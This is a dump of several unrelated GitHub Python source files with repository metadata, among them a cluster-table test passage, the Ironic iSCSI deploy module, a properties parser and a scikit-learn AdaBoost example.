# construct the mock clusters to put
clusters = [
Cluster(['d1', 'd2', 'd3', 'd4', 'd5']),
Cluster(['e1'])
]
clusters[0].categories = str(['sports', 'national'])
clusters[1].categories = str(['business'])
clusters[0].countries = str(['india', 'nepal'])
clusters[1].countries = str(['india'])
clusters[0].locales = str(['bangalore', 'chennai'])
clusters[1].locales = str(['hyderabad'])
clusters[0].publishers = str(['TOI', 'Hindu', 'Deccan Herald'])
clusters[1].publishers = str(['Firstpost'])
clusters[0].languages = str(['en'])
clusters[1].languages = str(['es'])
clusters[0].duplicates = ['d4']
clusters[1].duplicates = []
self.clusters = clusters
self.clusterTableManager = ClusterTableManager()
self.clusterTableManager.createFreshTable()
# wait for table to get created and add entries
time.sleep(10);
self.clusterTableManager.addClusters(self.clusters)
@classmethod
def tearDownClass(self):
time.sleep(1);
self.clusterTableManager.deleteTable()
def testGet(self):
#simple get
result = self.clusterTableManager.getCluster(self.clusters[0].id)
self.assertEqual(result.id, self.clusters[0].id)
result = self.clusterTableManager.getCluster(self.clusters[1].id)
self.assertEqual(result.id, self.clusters[1].id)
def testQueries(self):
#query by category & country
result = self.clusterTableManager.queryByCategoryAndCountry('sports', 'nepal')
self.assertEqual(list(result)[0].id, self.clusters[0].id)
result = self.clusterTableManager.queryByCategoryAndCountry('business', 'india')
self.assertEqual(list(result)[0].id, self.clusters[1].id)
#query by locale
result = self.clusterTableManager.queryByLocale('bangalore')
self.assertEqual(list(result)[0].id, self.clusters[0].id)
result = self.clusterTableManager.queryByLocale('chennai')
self.assertEqual(list(result)[0].id, self.clusters[0].id)
result = self.clusterTableManager.queryByLocale('hyderabad')
self.assertEqual(list(result)[0].id, self.clusters[1].id)
def testDelete(self):
self.clusterTableManager.deleteCluster(self.clusters[0])
#just to ensure delete operation works if item isn't there
self.clusterTableManager.deleteCluster(self.clusters[0])
result = self.clusterTableManager.getCluster(self.clusters[0].id)
self.assertEqual(result, None)
self.clusterTableManager.addCluster(self.clusters[0])
|
{
"content_hash": "406c8f7ed6ff1a516bf2ac0758afdd00",
"timestamp": "",
"source": "github",
"line_count": 77,
"max_line_length": 84,
"avg_line_length": 35,
"alnum_prop": 0.7072356215213358,
"repo_name": "adityabansal/newsAroundMe",
"id": "109ef5d88b4c53579300bccb76c44ae6d7d9e0d8",
"size": "2695",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/clusterTableManager_testDisabled.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "4444"
},
{
"name": "HTML",
"bytes": "13445"
},
{
"name": "JavaScript",
"bytes": "21507"
},
{
"name": "Python",
"bytes": "159005"
}
],
"symlink_target": ""
}
|
"""Google Stackdriver Logging API wrapper."""
from pkg_resources import get_distribution
__version__ = get_distribution('google-cloud-logging').version
from google.cloud.logging.client import Client
ASCENDING = 'timestamp asc'
"""Query string to order by ascending timestamps."""
DESCENDING = 'timestamp desc'
"""Query string to order by decending timestamps."""
__all__ = ['__version__', 'ASCENDING', 'Client', 'DESCENDING']
|
{
"content_hash": "53c97aeb402612b5bf0cbd4288776177",
"timestamp": "",
"source": "github",
"line_count": 15,
"max_line_length": 62,
"avg_line_length": 28.8,
"alnum_prop": 0.7291666666666666,
"repo_name": "ammarkhann/FinalSeniorCode",
"id": "cced78370c6a6b8d5fbd6434d83316acaf3f3937",
"size": "1008",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "lib/python2.7/site-packages/google/cloud/logging/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "229289"
},
{
"name": "C++",
"bytes": "171536"
},
{
"name": "CSS",
"bytes": "928345"
},
{
"name": "Fortran",
"bytes": "14107"
},
{
"name": "HTML",
"bytes": "853239"
},
{
"name": "JavaScript",
"bytes": "4838516"
},
{
"name": "Jupyter Notebook",
"bytes": "518186"
},
{
"name": "Makefile",
"bytes": "214"
},
{
"name": "Matlab",
"bytes": "4346"
},
{
"name": "Python",
"bytes": "81804894"
},
{
"name": "Roff",
"bytes": "6673"
},
{
"name": "Shell",
"bytes": "3409"
},
{
"name": "Smarty",
"bytes": "28408"
},
{
"name": "TeX",
"bytes": "1527"
},
{
"name": "XSLT",
"bytes": "366202"
}
],
"symlink_target": ""
}
|
"""
Start Test= 1365719423.979371
ms since start...
Network start = 1001.649857
Network started = 18143.102884
Mote start = 18151.414871
Mote detect start = 19177.054882
Mote detected = 19177.067995
Mote ping = 19177.072048
Mote reached = 28441.315889
Mote stopped = 28754.582882
Network stop = 28757.023811
Network stopped = 28757.169008
Stop Test = 29759.605885
"""
import os
import sys
import ast
import pylab
def parse_times(infile):
if not os.path.exists(infile):
exit(1)
time_relative = {}
time_delta = {}
with open(infile) as f:
for line in f:
if line.find(" = ") != -1:
rawinfo = line.split(" = ")
if "Ping stat" in rawinfo[0]:
time_relative[rawinfo[0]] = ast.literal_eval(rawinfo[1])
else:
time_relative[rawinfo[0]] = float(rawinfo[1])
time_delta["test"] = time_relative["Stop Test"]
time_delta["network-uptime"] = time_relative["Network stopped"] - time_relative["Network start"]
time_delta["network-start"] = time_relative["Network started"] - time_relative["Network start"]
time_delta["network-stop"] = time_relative["Network stopped"] - time_relative["Network stop"]
time_delta["mote-uptime"] = time_relative["Mote stopped"] - time_relative["Mote start"]
#time_delta["mote-start"] = time_relative["Mote detect start"] - time_relative["Mote start"]
time_delta["mote-stop"] = time_relative["Mote stopped"] - time_relative["Mote reached"]
time_delta["mote-detect"] = time_relative["Mote detected"] - time_relative["Mote start"]
time_delta["ping1"] = time_relative["Mote reached"] - time_relative["Mote ping"]
if time_relative.has_key("Moved mote ping"):
time_delta["pingm"] = time_relative["Moved mote reached"] - time_relative["Moved mote ping"]
elif time_relative.has_key("Mote ping2"):
time_delta["ping2"] = time_relative["Mote reached2"] - time_relative["Mote ping2"]
if time_relative.has_key("Ping stat"):
#time_relative["Ping stat"] = ast.literal_eval(time_relative["Ping stat"])
time_delta["ping2-stat"] = time_relative["Ping stat"]
time_delta["ping2-mean"] = pylab.mean(time_relative["Ping stat"])
time_delta["ping2-std"] = pylab.std(time_relative["Ping stat"])
time_delta["ping2-var"] = pylab.var(time_relative["Ping stat"])
return time_delta
if __name__ == "__main__":
if len(argv)<2:
exit(1)
parse_times(sys.argv[1])
|
{
"content_hash": "ac22c3edd201d1f36ebc56216e7a90fe",
"timestamp": "",
"source": "github",
"line_count": 67,
"max_line_length": 100,
"avg_line_length": 37.44776119402985,
"alnum_prop": 0.6388999601434835,
"repo_name": "bluerover/6lbr",
"id": "c77d79f7ff946a40c16467fddedcc8c656ac0e55",
"size": "2531",
"binary": false,
"copies": "2",
"ref": "refs/heads/develop",
"path": "examples/6lbr/test/postprocessing/pp_time.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Assembly",
"bytes": "119107"
},
{
"name": "Awk",
"bytes": "95"
},
{
"name": "C",
"bytes": "13501042"
},
{
"name": "C++",
"bytes": "1217325"
},
{
"name": "CSS",
"bytes": "6645"
},
{
"name": "HTML",
"bytes": "5676"
},
{
"name": "JavaScript",
"bytes": "10186"
},
{
"name": "Makefile",
"bytes": "49808"
},
{
"name": "Objective-C",
"bytes": "213752"
},
{
"name": "Perl",
"bytes": "17388"
},
{
"name": "Python",
"bytes": "19332"
},
{
"name": "Shell",
"bytes": "1686"
},
{
"name": "XSLT",
"bytes": "4947"
}
],
"symlink_target": ""
}
|
import os
from oslo.config import cfg
from oslo.utils import strutils
from ironic.common import exception
from ironic.common.i18n import _
from ironic.common.i18n import _LE
from ironic.common.i18n import _LI
from ironic.common import image_service as service
from ironic.common import keystone
from ironic.common import states
from ironic.common import utils
from ironic.conductor import utils as manager_utils
from ironic.drivers.modules import deploy_utils
from ironic.drivers.modules import image_cache
from ironic.drivers import utils as driver_utils
from ironic.openstack.common import fileutils
from ironic.openstack.common import log as logging
LOG = logging.getLogger(__name__)
# NOTE(rameshg87): This file now registers some of opts in pxe group.
# This is acceptable for now as a future refactoring into
# separate boot and deploy interfaces is planned, and moving config
# options twice is not recommended. Hence we would move the parameters
# to the appropriate place in the final refactoring.
pxe_opts = [
cfg.StrOpt('pxe_append_params',
default='nofb nomodeset vga=normal',
help='Additional append parameters for baremetal PXE boot.'),
cfg.StrOpt('default_ephemeral_format',
default='ext4',
help='Default file system format for ephemeral partition, '
'if one is created.'),
cfg.StrOpt('images_path',
default='/var/lib/ironic/images/',
help='Directory where images are stored on disk.'),
cfg.StrOpt('instance_master_path',
default='/var/lib/ironic/master_images',
help='Directory where master instance images are stored on '
'disk.'),
cfg.IntOpt('image_cache_size',
default=20480,
help='Maximum size (in MiB) of cache for master images, '
'including those in use.'),
# 10080 here is 1 week - 60*24*7. It is entirely arbitrary in the absence
# of a facility to disable the ttl entirely.
cfg.IntOpt('image_cache_ttl',
default=10080,
help='Maximum TTL (in minutes) for old master images in '
'cache.'),
cfg.StrOpt('disk_devices',
default='cciss/c0d0,sda,hda,vda',
help='The disk devices to scan while doing the deploy.'),
]
CONF = cfg.CONF
CONF.register_opts(pxe_opts, group='pxe')
@image_cache.cleanup(priority=50)
class InstanceImageCache(image_cache.ImageCache):
def __init__(self, image_service=None):
super(self.__class__, self).__init__(
CONF.pxe.instance_master_path,
# MiB -> B
cache_size=CONF.pxe.image_cache_size * 1024 * 1024,
# min -> sec
cache_ttl=CONF.pxe.image_cache_ttl * 60,
image_service=image_service)
def _get_image_dir_path(node_uuid):
"""Generate the dir for an instances disk."""
return os.path.join(CONF.pxe.images_path, node_uuid)
def _get_image_file_path(node_uuid):
"""Generate the full path for an instances disk."""
return os.path.join(_get_image_dir_path(node_uuid), 'disk')
def parse_instance_info(node):
"""Gets the instance specific Node deployment info.
This method validates whether the 'instance_info' property of the
supplied node contains the required information for this driver to
deploy images to the node.
:param node: a single Node.
:returns: A dict with the instance_info values.
:raises: MissingParameterValue, if any of the required parameters are
missing.
:raises: InvalidParameterValue, if any of the parameters have invalid
value.
"""
info = node.instance_info
i_info = {}
i_info['image_source'] = info.get('image_source')
i_info['root_gb'] = info.get('root_gb')
error_msg = _("Cannot validate iSCSI deploy. Some parameters were missing"
" in node's instance_info")
deploy_utils.check_for_missing_params(i_info, error_msg)
# Internal use only
i_info['deploy_key'] = info.get('deploy_key')
i_info['swap_mb'] = info.get('swap_mb', 0)
i_info['ephemeral_gb'] = info.get('ephemeral_gb', 0)
i_info['ephemeral_format'] = info.get('ephemeral_format')
err_msg_invalid = _("Cannot validate parameter for iSCSI deploy. "
"Invalid parameter %(param)s. Reason: %(reason)s")
for param in ('root_gb', 'swap_mb', 'ephemeral_gb'):
try:
int(i_info[param])
except ValueError:
reason = _("'%s' is not an integer value.") % i_info[param]
raise exception.InvalidParameterValue(err_msg_invalid %
{'param': param, 'reason': reason})
if i_info['ephemeral_gb'] and not i_info['ephemeral_format']:
i_info['ephemeral_format'] = CONF.pxe.default_ephemeral_format
preserve_ephemeral = info.get('preserve_ephemeral', False)
try:
i_info['preserve_ephemeral'] = strutils.bool_from_string(
preserve_ephemeral, strict=True)
except ValueError as e:
raise exception.InvalidParameterValue(err_msg_invalid %
{'param': 'preserve_ephemeral', 'reason': e})
return i_info
def check_image_size(task):
"""Check if the requested image is larger than the root partition size.
:param task: a TaskManager instance containing the node to act on.
:raises: InstanceDeployFailure if size of the image is greater than root
partition.
"""
i_info = parse_instance_info(task.node)
image_path = _get_image_file_path(task.node.uuid)
image_mb = deploy_utils.get_image_mb(image_path)
root_mb = 1024 * int(i_info['root_gb'])
if image_mb > root_mb:
msg = (_('Root partition is too small for requested image. '
'Image size: %(image_mb)d MB, Root size: %(root_mb)d MB')
% {'image_mb': image_mb, 'root_mb': root_mb})
raise exception.InstanceDeployFailure(msg)
def cache_instance_image(ctx, node):
"""Fetch the instance's image from Glance
This method pulls the AMI and writes them to the appropriate place
on local disk.
:param ctx: context
:param node: an ironic node object
:returns: a tuple containing the uuid of the image and the path in
the filesystem where image is cached.
"""
i_info = parse_instance_info(node)
fileutils.ensure_tree(_get_image_dir_path(node.uuid))
image_path = _get_image_file_path(node.uuid)
uuid = i_info['image_source']
LOG.debug("Fetching image %(ami)s for node %(uuid)s",
{'ami': uuid, 'uuid': node.uuid})
deploy_utils.fetch_images(ctx, InstanceImageCache(), [(uuid, image_path)],
CONF.force_raw_images)
return (uuid, image_path)
def destroy_images(node_uuid):
"""Delete instance's image file.
:param node_uuid: the uuid of the ironic node.
"""
utils.unlink_without_raise(_get_image_file_path(node_uuid))
utils.rmtree_without_raise(_get_image_dir_path(node_uuid))
InstanceImageCache().clean_up()
def get_deploy_info(node, **kwargs):
"""Returns the information required for doing iSCSI deploy in a dictionary.
:param node: ironic node object
:param kwargs: the keyword args passed from the conductor node.
:raises: MissingParameterValue, if some required parameters were not
passed.
:raises: InvalidParameterValue, if any of the parameters have invalid
value.
"""
deploy_key = kwargs.get('key')
i_info = parse_instance_info(node)
if i_info['deploy_key'] != deploy_key:
raise exception.InvalidParameterValue(_("Deploy key does not match"))
params = {'address': kwargs.get('address'),
'port': kwargs.get('port', '3260'),
'iqn': kwargs.get('iqn'),
'lun': kwargs.get('lun', '1'),
'image_path': _get_image_file_path(node.uuid),
'root_mb': 1024 * int(i_info['root_gb']),
'swap_mb': int(i_info['swap_mb']),
'ephemeral_mb': 1024 * int(i_info['ephemeral_gb']),
'preserve_ephemeral': i_info['preserve_ephemeral'],
'node_uuid': node.uuid,
}
missing = [key for key in params if params[key] is None]
if missing:
raise exception.MissingParameterValue(_(
"Parameters %s were not passed to ironic"
" for deploy.") % missing)
# ephemeral_format is nullable
params['ephemeral_format'] = i_info.get('ephemeral_format')
return params
def set_failed_state(task, msg):
"""Sets the deploy status as failed with relevant messages.
This method sets the deployment as fail with the given message.
It sets node's provision_state to DEPLOYFAIL and updates last_error
with the given error message. It also powers off the baremetal node.
:param task: a TaskManager instance containing the node to act on.
:param msg: the message to set in last_error of the node.
"""
node = task.node
node.provision_state = states.DEPLOYFAIL
node.target_provision_state = states.NOSTATE
node.save()
try:
manager_utils.node_power_action(task, states.POWER_OFF)
except Exception:
msg2 = (_('Node %s failed to power off while handling deploy '
'failure. This may be a serious condition. Node '
'should be removed from Ironic or put in maintenance '
'mode until the problem is resolved.') % node.uuid)
LOG.exception(msg2)
finally:
# NOTE(deva): node_power_action() erases node.last_error
# so we need to set it again here.
node.last_error = msg
node.save()
def continue_deploy(task, **kwargs):
"""Resume a deployment upon getting POST data from deploy ramdisk.
This method raises no exceptions because it is intended to be
invoked asynchronously as a callback from the deploy ramdisk.
:param task: a TaskManager instance containing the node to act on.
:param kwargs: the kwargs to be passed to deploy.
:returns: UUID of the root partition or None on error.
"""
node = task.node
node.provision_state = states.DEPLOYING
node.save()
params = get_deploy_info(node, **kwargs)
ramdisk_error = kwargs.get('error')
if ramdisk_error:
LOG.error(_LE('Error returned from deploy ramdisk: %s'),
ramdisk_error)
set_failed_state(task, _('Failure in deploy ramdisk.'))
destroy_images(node.uuid)
return
LOG.info(_LI('Continuing deployment for node %(node)s, params %(params)s'),
{'node': node.uuid, 'params': params})
root_uuid = None
try:
root_uuid = deploy_utils.deploy(**params)
except Exception as e:
LOG.error(_LE('Deploy failed for instance %(instance)s. '
'Error: %(error)s'),
{'instance': node.instance_uuid, 'error': e})
set_failed_state(task, _('Failed to continue iSCSI deployment.'))
destroy_images(node.uuid)
return root_uuid
def build_deploy_ramdisk_options(node):
"""Build the ramdisk config options for a node
This method builds the ramdisk options for a node,
given all the required parameters for doing iscsi deploy.
:param node: a single Node.
:returns: A dictionary of options to be passed to ramdisk for performing
the deploy.
"""
# NOTE: we should strip '/' from the end because this is intended for
# hardcoded ramdisk script
ironic_api = (CONF.conductor.api_url or
keystone.get_service_url()).rstrip('/')
deploy_key = utils.random_alnum(32)
i_info = node.instance_info
i_info['deploy_key'] = deploy_key
node.instance_info = i_info
node.save()
deploy_options = {
'deployment_id': node['uuid'],
'deployment_key': deploy_key,
'iscsi_target_iqn': "iqn-%s" % node.uuid,
'ironic_api_url': ironic_api,
'disk': CONF.pxe.disk_devices,
}
return deploy_options
def validate_glance_image_properties(ctx, deploy_info, properties):
"""Validate the image in Glance.
Check if the image exist in Glance and if it contains the
properties passed.
:param ctx: security context
:param deploy_info: the deploy_info to be validated
:param properties: the list of image meta-properties to be validated.
:raises: InvalidParameterValue if connection to glance failed or
authorization for accessing image failed or if image doesn't exist.
:raises: MissingParameterValue if the glance image doesn't contain
the mentioned properties.
"""
image_id = deploy_info['image_source']
try:
glance_service = service.Service(version=1, context=ctx)
image_props = glance_service.show(image_id)['properties']
except (exception.GlanceConnectionFailed,
exception.ImageNotAuthorized,
exception.Invalid):
raise exception.InvalidParameterValue(_(
"Failed to connect to Glance to get the properties "
"of the image %s") % image_id)
except exception.ImageNotFound:
raise exception.InvalidParameterValue(_(
"Image %s not found in Glance") % image_id)
missing_props = []
for prop in properties:
if not image_props.get(prop):
missing_props.append(prop)
if missing_props:
props = ', '.join(missing_props)
raise exception.MissingParameterValue(_(
"Image %(image)s is missing the following properties: "
"%(properties)s") % {'image': image_id, 'properties': props})
def validate(task):
"""Validates the pre-requisites for iSCSI deploy.
Validates whether node in the task provided has some ports enrolled.
This method validates whether conductor url is available either from CONF
file or from keystone.
:param task: a TaskManager instance containing the node to act on.
:raises: InvalidParameterValue if the URL of the Ironic API service is not
configured in config file and is not accessible via Keystone
catalog.
:raises: MissingParameterValue if no ports are enrolled for the given node.
"""
node = task.node
if not driver_utils.get_node_mac_addresses(task):
raise exception.MissingParameterValue(_("Node %s does not have "
"any port associated with it.") % node.uuid)
try:
# TODO(lucasagomes): Validate the format of the URL
CONF.conductor.api_url or keystone.get_service_url()
except (exception.KeystoneFailure,
exception.CatalogNotFound,
exception.KeystoneUnauthorized) as e:
raise exception.InvalidParameterValue(_(
"Couldn't get the URL of the Ironic API service from the "
"configuration file or keystone catalog. Keystone error: %s") % e)
|
{
"content_hash": "f35c9fa3778bd78eef5d3498dd801a16",
"timestamp": "",
"source": "github",
"line_count": 398,
"max_line_length": 79,
"avg_line_length": 37.82663316582914,
"alnum_prop": 0.6401195616074394,
"repo_name": "Tehsmash/ironic",
"id": "5526018caf002794ab11e20c8874eb09a2480a1d",
"size": "15712",
"binary": false,
"copies": "1",
"ref": "refs/heads/staging/kiloplus",
"path": "ironic/drivers/modules/iscsi_deploy.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "2250030"
}
],
"symlink_target": ""
}
|
import re
from lline import LLine
def to_logical_lines(natural_lines):
""" Parse natural lines into a list of logical lines."""
lines = []
terminated_logical_line = True
for l in natural_lines:
if _is_comment(l):
lines.append(LLine(natural_lines=[l], key=None, value=None))
continue
if not terminated_logical_line:
lines[-1].natural_lines.append(l)
terminated_logical_line = _is_terminated(l)
continue
if _is_empty(l):
lines.append(LLine(natural_lines=[l], key=None, value=None))
continue
key, value = _to_key_value(l)
if key is not None:
lines.append(LLine(natural_lines=[l], key=key, value=value))
terminated_logical_line = _is_terminated(l)
return lines
# ----------------------------------
# Helper parsing functions
# ----------------------------------
def _is_comment(line):
return re.search(r'^\s*[!#]', line) is not None
def _is_empty(line):
return len(line.strip()) == 0
def _is_terminated(line):
"""Return true if value continues on next line"""
m = re.search(r'\\+$', line)
return m is None or len(m.group(0)) % 2 == 0
def _to_key_value(line):
"""Parse a line into a (key,value) tuple"""
pair = re.match(r'\s*(?P<key>((\\[ =:])|[^ =:\s])+)\s*([=: ]\s*(?P<value>.*))?$', line)
if pair is None:
return None, None
else:
return pair.group('key'), pair.group('value') or ''
|
{
"content_hash": "c1b7e0af0f8fa66bad08e9e830bbf839",
"timestamp": "",
"source": "github",
"line_count": 58,
"max_line_length": 91,
"avg_line_length": 26.17241379310345,
"alnum_prop": 0.5428194993412385,
"repo_name": "mkrcah/propsort",
"id": "21c1a9d3a3d6259b6c2276ccf2bac315be62042e",
"size": "1518",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "propsort/parsing.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "9898"
}
],
"symlink_target": ""
}
|
from poweredsites.libs.handler import ErrorHandler
handlers = []
sub_handlers = []
ui_modules = {}
from poweredsites.handlers import admin, blog, front, \
help, project, site, user
handlers.extend(front.handlers)
handlers.extend(user.handlers)
handlers.extend(site.handlers)
handlers.extend(project.handlers)
handlers.extend(help.handlers)
# Append default 404 handler, and make sure it is the last one.
handlers.append((r".*", ErrorHandler))
sub_handlers.append(site.sub_handlers)
sub_handlers.append(blog.sub_handlers)
sub_handlers.append(admin.sub_handlers)
# wildcat subdomain handler for project should be the last one.
sub_handlers.append(project.sub_handlers)
ui_modules.update(front.ui_modules)
ui_modules.update(site.ui_modules)
ui_modules.update(project.ui_modules)
ui_modules.update(blog.ui_modules)
for sh in sub_handlers:
sh.append((r".*", ErrorHandler))
|
{
"content_hash": "f0d410720154a6b2f968264cc08fe8dc",
"timestamp": "",
"source": "github",
"line_count": 34,
"max_line_length": 63,
"avg_line_length": 27.294117647058822,
"alnum_prop": 0.7359913793103449,
"repo_name": "felinx/poweredsites",
"id": "db0dc2cdcface30eda39649fcde522221651e514",
"size": "1552",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "poweredsites/urls.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "JavaScript",
"bytes": "156464"
},
{
"name": "Python",
"bytes": "155120"
},
{
"name": "Shell",
"bytes": "0"
}
],
"symlink_target": ""
}
|
"""
=====================================
Multi-class AdaBoosted Decision Trees
=====================================
This example reproduces Figure 1 of Zhu et al [1] and shows how boosting can
improve prediction accuracy on a multi-class problem. The classification
dataset is constructed by taking a ten-dimensional standard normal distribution
and defining three classes separated by nested concentric ten-dimensional
spheres such that roughly equal numbers of samples are in each class (quantiles
of the :math:`\chi^2` distribution).
The performance of the SAMME and SAMME.R [1] algorithms are compared. SAMME.R
uses the probability estimates to update the additive model, while SAMME uses
the classifications only. As the example illustrates, the SAMME.R algorithm
typically converges faster than SAMME, achieving a lower test error with fewer
boosting iterations. The error of each algorithm on the test set after each
boosting iteration is shown on the left, the classification error on the test
set of each tree is shown in the middle, and the boost weight of each tree is
shown on the right. All trees have a weight of one in the SAMME.R algorithm and
therefore are not shown.
.. [1] J. Zhu, H. Zou, S. Rosset, T. Hastie, "Multi-class AdaBoost", 2009.
"""
print(__doc__)
# Author: Noel Dawe <noel.dawe@gmail.com>
#
# License: BSD 3 clause
from sklearn.externals.six.moves import zip
import matplotlib.pyplot as plt
from sklearn.datasets import make_gaussian_quantiles
from sklearn.ensemble import AdaBoostClassifier
from sklearn.externals.six.moves import xrange
from sklearn.metrics import accuracy_score
from sklearn.tree import DecisionTreeClassifier
X, y = make_gaussian_quantiles(n_samples=13000, n_features=10,
n_classes=3, random_state=1)
n_split = 3000
X_train, X_test = X[:n_split], X[n_split:]
y_train, y_test = y[:n_split], y[n_split:]
bdt_real = AdaBoostClassifier(
DecisionTreeClassifier(max_depth=2),
n_estimators=600,
learning_rate=1)
bdt_discrete = AdaBoostClassifier(
DecisionTreeClassifier(max_depth=2),
n_estimators=600,
learning_rate=1.5,
algorithm="SAMME")
bdt_real.fit(X_train, y_train)
bdt_discrete.fit(X_train, y_train)
real_test_errors = []
discrete_test_errors = []
for real_test_predict, discrete_train_predict in zip(
bdt_real.staged_predict(X_test), bdt_discrete.staged_predict(X_test)):
real_test_errors.append(
1. - accuracy_score(real_test_predict, y_test))
discrete_test_errors.append(
1. - accuracy_score(discrete_train_predict, y_test))
n_trees = xrange(1, len(bdt_discrete) + 1)
plt.figure(figsize=(15, 5))
plt.subplot(131)
plt.plot(n_trees, discrete_test_errors, c='black', label='SAMME')
plt.plot(n_trees, real_test_errors, c='black',
linestyle='dashed', label='SAMME.R')
plt.legend()
plt.ylim(0.18, 0.62)
plt.ylabel('Test Error')
plt.xlabel('Number of Trees')
plt.subplot(132)
plt.plot(n_trees, bdt_discrete.estimator_errors_, "b", label='SAMME', alpha=.5)
plt.plot(n_trees, bdt_real.estimator_errors_, "r", label='SAMME.R', alpha=.5)
plt.legend()
plt.ylabel('Error')
plt.xlabel('Number of Trees')
plt.ylim((.2,
max(bdt_real.estimator_errors_.max(),
bdt_discrete.estimator_errors_.max()) * 1.2))
plt.xlim((-20, len(bdt_discrete) + 20))
plt.subplot(133)
plt.plot(n_trees, bdt_discrete.estimator_weights_, "b", label='SAMME')
plt.legend()
plt.ylabel('Weight')
plt.xlabel('Number of Trees')
plt.ylim((0, bdt_discrete.estimator_weights_.max() * 1.2))
plt.xlim((-20, len(bdt_discrete) + 20))
# prevent overlapping y-axis labels
plt.subplots_adjust(wspace=0.25)
plt.show()
|
{
"content_hash": "3e0b19fe57ea853c450e0f43c740f7bb",
"timestamp": "",
"source": "github",
"line_count": 109,
"max_line_length": 79,
"avg_line_length": 33.56880733944954,
"alnum_prop": 0.7122164525826729,
"repo_name": "treycausey/scikit-learn",
"id": "9fe609f489c289279b66fa73c39725e28817e6d7",
"size": "3659",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "examples/ensemble/plot_adaboost_multiclass.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "18150950"
},
{
"name": "C++",
"bytes": "1807769"
},
{
"name": "JavaScript",
"bytes": "20564"
},
{
"name": "Python",
"bytes": "5083789"
},
{
"name": "Shell",
"bytes": "3768"
}
],
"symlink_target": ""
}
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.